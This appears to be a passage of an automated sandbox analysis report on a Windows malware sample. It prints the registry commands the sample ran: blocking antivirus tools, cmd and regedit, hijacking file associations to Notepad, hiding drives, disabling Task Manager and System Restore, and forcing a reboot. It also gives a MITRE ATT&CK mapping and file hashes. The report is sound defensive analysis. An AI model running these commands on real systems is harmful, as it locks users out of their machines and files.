    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "100" /t REG_SZ /d "aswidsagent.exe" /f
    3⤵
    PID:3316
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "101" /t REG_SZ /d "AvastBrowserCrashHandler.exe" /f
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "102" /t REG_SZ /d "AvastBrowserCrashHandler64.exe" /f
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "103" /t REG_SZ /d "AvastBrowserCrashHandler32.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3224
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "104" /t REG_SZ /d "AvastBrowserCrashHandler86.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3760
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "105" /t REG_SZ /d "MSASCui.exe" /f
    3⤵
    PID:4152
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "106" /t REG_SZ /d "msdt.exe" /f
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "107" /t REG_SZ /d "MRT.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1396
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "108" /t REG_SZ /d "msiexec.exe" /f
    3⤵
    PID:5000
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "109" /t REG_SZ /d "msseces.exe" /f
    3⤵
    PID:4900
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "110" /t REG_SZ /d "control.exe" /f
    3⤵
    PID:5056
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "111" /t REG_SZ /d "mmc.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4632
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "112" /t REG_SZ /d "opera_crashreporter.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3264
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "113" /t REG_SZ /d "opera_autoupdate.exe" /f
    3⤵
    PID:636
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "114" /t REG_SZ /d "opera.exe" /f
    3⤵
    PID:4880
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "115" /t REG_SZ /d "MicrosoftEdge.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:4028
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "116" /t REG_SZ /d "MicrosoftEdgeCP.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1760
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "117" /t REG_SZ /d "MicrosoftEdgeSH.exe" /f
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "118" /t REG_SZ /d "launcher.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:676
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "119" /t REG_SZ /d "regedit.exe" /f
    3⤵
    PID:3688
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Windows\1.jpg /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:3180
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\mp3file\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:5100
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\mp4file\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:5116
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\exefile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies system executable filetype association
    PID:4588
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\pngfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4908
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\pdffile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:2072
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\icofile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4920
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\docxfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1904
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\docfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:2556
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\csvfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1136
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\hfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1700
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\cppfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1824
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\oggfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1580
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\avifile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:320
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\isofile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4692
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\zipfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:228
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\rarfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:236
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\pptfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1696
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\mkvfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:3308
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\xlsxfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4580
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\jpgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:3588
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\jpegfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:2588
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\tiffile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:2644
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\tmpfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:3868
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\dmgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:2168
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\slnfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:800
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\7zfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4116
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\afile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1404
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\001file\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1516
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\aafile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1148
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\allfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\binfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:4188
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\asmfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:2192
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\svgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1008
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\bmpfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4844
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\gzfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\cabfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:3408
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\cfgfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1252
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\cmdfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:952
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\comfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies system executable filetype association
    - Modifies registry class
    PID:564
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\cplfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:3664
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\ctfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:544
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\curfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1408
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\dllfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4172
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\htmfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4820
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\htmlfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:1064
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\wshfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:2924
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\vbsfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4768
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\jsfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\logfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:3300
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\wsffile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1264
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\jarfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:4640
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CLASSES_ROOT\cplfile\shell\open\command" /ve /t REG_SZ /d "notepad.exe" /f
    3⤵
    - Modifies registry class
    PID:1820
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSecurityTab /t REG_DWORD /d "1" /f
    3⤵
    PID:720
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d "67108863" /f
    3⤵
    PID:3216
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d "67108863" /f
    3⤵
    PID:1348
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d "1" /f
    3⤵
    PID:4836
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d "1" /f
    3⤵
    PID:4624
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d "1" /f
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d "1" /f
    3⤵
    PID:3540
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d "2" /f
    3⤵
    PID:2656
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v RestrictToPermittedSnapins /t REG_DWORD /d "1" /f
    3⤵
    PID:2612
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d "2" /f
    3⤵
    PID:5032
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "121" /t REG_SZ /d "cmd.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:1980
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "120" /t REG_SZ /d "powershell.exe" /f
    3⤵
    PID:3188
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DisableCAD /d "0" /f
    3⤵
    PID:5044
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
    3⤵
    PID:4656
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
    3⤵
    PID:5060
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t REG_DWORD /v "DisableRegistryTools" /d "1" /f
    3⤵
    - Disables RegEdit via registry modification
    PID:1920
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown -r -t 20
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4092

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa394d055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5116

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Change Default File Association

T1042

Hidden Files and Directories

T1158

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat

Filesize
848B

MD5
e59c7d9f080b068e3118e81385f467e7

SHA1
78ea57d55558847121cb70367d10dc9c6e833a26

SHA256
5c9bee6ecba73cda027b99dea013cd54f53524e35750da629f53c841d75b6e8f

SHA512
b452ccd1009f7976f4ba2f44c117bf2faee0768f22e9c55e41f16d4695cdcd296f0a4321de8dc4855536b364844dffad5df0d46cb711f1c49f024e3afc043475

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\42.exe

Filesize
27KB

MD5
daf9159a8fbc9510e9dc380c2cae924d

SHA1
5e1bf2dbe567ffc04c194b31de4f4e15c630cae5

SHA256
43118bc6f1c03b9f749efc244d7fd0553d45ec50ae2e4ea363e17f85f832290f

SHA512
88b01d7b3f76530124f8149668879b9cf66075f228e8c3000d75383bf10c11eb43bd5c83b445b19ec24de578415a26153d3fc0d329b6dd195f09f1226a960ea8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PkgMgr.00

Filesize
28KB

MD5
067ab27355743f95929213e08bc60ebb

SHA1
376436cef2b119a75cf29500e3efb37061b0fa16

SHA256
e621092e9b620bc589a4dd89d791352d266b139ceb9b3f13ddded5b536b52441

SHA512
97add0ebcee845d1c47eef6f91d990fccc025509c748e8d612716ac2342144578f4e29247f4824aeefaf5ee143b31837fb5eb487726855ed43a42ccd14431ba0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PkgMgr.00

Filesize
28KB

MD5
067ab27355743f95929213e08bc60ebb

SHA1
376436cef2b119a75cf29500e3efb37061b0fa16

SHA256
e621092e9b620bc589a4dd89d791352d266b139ceb9b3f13ddded5b536b52441

SHA512
97add0ebcee845d1c47eef6f91d990fccc025509c748e8d612716ac2342144578f4e29247f4824aeefaf5ee143b31837fb5eb487726855ed43a42ccd14431ba0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PkgMgr.bat

Filesize
28KB

MD5
fed4789f3fbd52e720ae7234600d5652

SHA1
273db24c6044f936359bdd272eb14c0fb2f6e117

SHA256
03dfd466366ffbe32e9e487cdc2136c62b4b4f57c365e255ef8e0c36991fb8b0

SHA512
ff2dc7069ea16bea767b1f9f6efa60b15cef3573a8de5e92d4766646e030f3db89fb4789cf51526b7d10d6d03b1348748d1f7c1162f7382e943261102f6d0435

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cew.00

Filesize
344KB

MD5
9311b831777f14f7c81af8cb67259a3b

SHA1
8178284b89f5429f4ab6143a652944da563124c2

SHA256
1479da32b193676068062236730ce9a5dbcae727ec0eea63b18252f9cb744707

SHA512
86d334db1eca671d2af34786337316a6570236ad12c23fa3f84884776d550abcc6403100e17b23b97c761e97dedd8b8b135c4d49332623894c5f57a5e6eb1fc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cew.01

Filesize
2KB

MD5
0f92fcbacb68fb014cfa248c31448e6b

SHA1
64d5dea54df6a03490849d04a174a7e8d690ebb4

SHA256
8b2d86fe88a75c0e0c312fdc7d1f54d113d33af729d2be52622f2b538a7a7049

SHA512
10f8f0fa7fdaede1b369e35e9bb0cf44ef7de02d4c7c3d644b5c2e80b405f9927acd167c996957e18f0a38fe41be4afdfd420bbe8a539332a93238565576236b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exe

Filesize
44KB

MD5
a1cd6a64e8f8ad5d4b6c07dc4113c7ec

SHA1
60e2f48a51c061bba72a08f34be781354f87aa49

SHA256
b994ae5cbfb5ad308656e9a8bf7a4a866fdeb9e23699f89f048d7f92e6bb8577

SHA512
87a42901a63793653d49f1c6d410a429cabb470b4c340c4553cbd9eccacb38d8543f85455465e0a432d737e950c590175dad744094861f7c3e575446a65b41e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exe

Filesize
44KB

MD5
a1cd6a64e8f8ad5d4b6c07dc4113c7ec

SHA1
60e2f48a51c061bba72a08f34be781354f87aa49

SHA256
b994ae5cbfb5ad308656e9a8bf7a4a866fdeb9e23699f89f048d7f92e6bb8577

SHA512
87a42901a63793653d49f1c6d410a429cabb470b4c340c4553cbd9eccacb38d8543f85455465e0a432d737e950c590175dad744094861f7c3e575446a65b41e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.bat

Filesize
1KB

MD5
9492f33971cfd6b77484342e42097731

SHA1
6cce167289894928d4bc6da2e263a354cbe2b174

SHA256
2f4637dd7a3125bf60d5651cc851c8ef9cf7c461dd89eed404dd9f5a381844e4

SHA512
c685295c91f2765ec3e3ab72fa7c124335d4d570df418427b11c7cd96e3cad5ad8563bc114052de0ecc9d909f671f72663c72015f5415f44c67d24ca21462dcc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.bat

Filesize
1KB

MD5
9492f33971cfd6b77484342e42097731

SHA1
6cce167289894928d4bc6da2e263a354cbe2b174

SHA256
2f4637dd7a3125bf60d5651cc851c8ef9cf7c461dd89eed404dd9f5a381844e4

SHA512
c685295c91f2765ec3e3ab72fa7c124335d4d570df418427b11c7cd96e3cad5ad8563bc114052de0ecc9d909f671f72663c72015f5415f44c67d24ca21462dcc

Download Submit
C:\Windows\1.bat

Filesize
848B

MD5
e59c7d9f080b068e3118e81385f467e7

SHA1
78ea57d55558847121cb70367d10dc9c6e833a26

SHA256
5c9bee6ecba73cda027b99dea013cd54f53524e35750da629f53c841d75b6e8f

SHA512
b452ccd1009f7976f4ba2f44c117bf2faee0768f22e9c55e41f16d4695cdcd296f0a4321de8dc4855536b364844dffad5df0d46cb711f1c49f024e3afc043475

Download Submit
C:\Windows\1.jpg

Filesize
344KB

MD5
9311b831777f14f7c81af8cb67259a3b

SHA1
8178284b89f5429f4ab6143a652944da563124c2

SHA256
1479da32b193676068062236730ce9a5dbcae727ec0eea63b18252f9cb744707

SHA512
86d334db1eca671d2af34786337316a6570236ad12c23fa3f84884776d550abcc6403100e17b23b97c761e97dedd8b8b135c4d49332623894c5f57a5e6eb1fc4

Download Submit
C:\Windows\42.exe

Filesize
27KB

MD5
daf9159a8fbc9510e9dc380c2cae924d

SHA1
5e1bf2dbe567ffc04c194b31de4f4e15c630cae5

SHA256
43118bc6f1c03b9f749efc244d7fd0553d45ec50ae2e4ea363e17f85f832290f

SHA512
88b01d7b3f76530124f8149668879b9cf66075f228e8c3000d75383bf10c11eb43bd5c83b445b19ec24de578415a26153d3fc0d329b6dd195f09f1226a960ea8

Download Submit
C:\Windows\AIDS_NT_Instructions.txt

Filesize
2KB

MD5
0f92fcbacb68fb014cfa248c31448e6b

SHA1
64d5dea54df6a03490849d04a174a7e8d690ebb4

SHA256
8b2d86fe88a75c0e0c312fdc7d1f54d113d33af729d2be52622f2b538a7a7049

SHA512
10f8f0fa7fdaede1b369e35e9bb0cf44ef7de02d4c7c3d644b5c2e80b405f9927acd167c996957e18f0a38fe41be4afdfd420bbe8a539332a93238565576236b

Download Submit
C:\Windows\nircmd.exe

Filesize
44KB

MD5
a1cd6a64e8f8ad5d4b6c07dc4113c7ec

SHA1
60e2f48a51c061bba72a08f34be781354f87aa49

SHA256
b994ae5cbfb5ad308656e9a8bf7a4a866fdeb9e23699f89f048d7f92e6bb8577

SHA512
87a42901a63793653d49f1c6d410a429cabb470b4c340c4553cbd9eccacb38d8543f85455465e0a432d737e950c590175dad744094861f7c3e575446a65b41e8

Download Submit
memory/3868-187-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads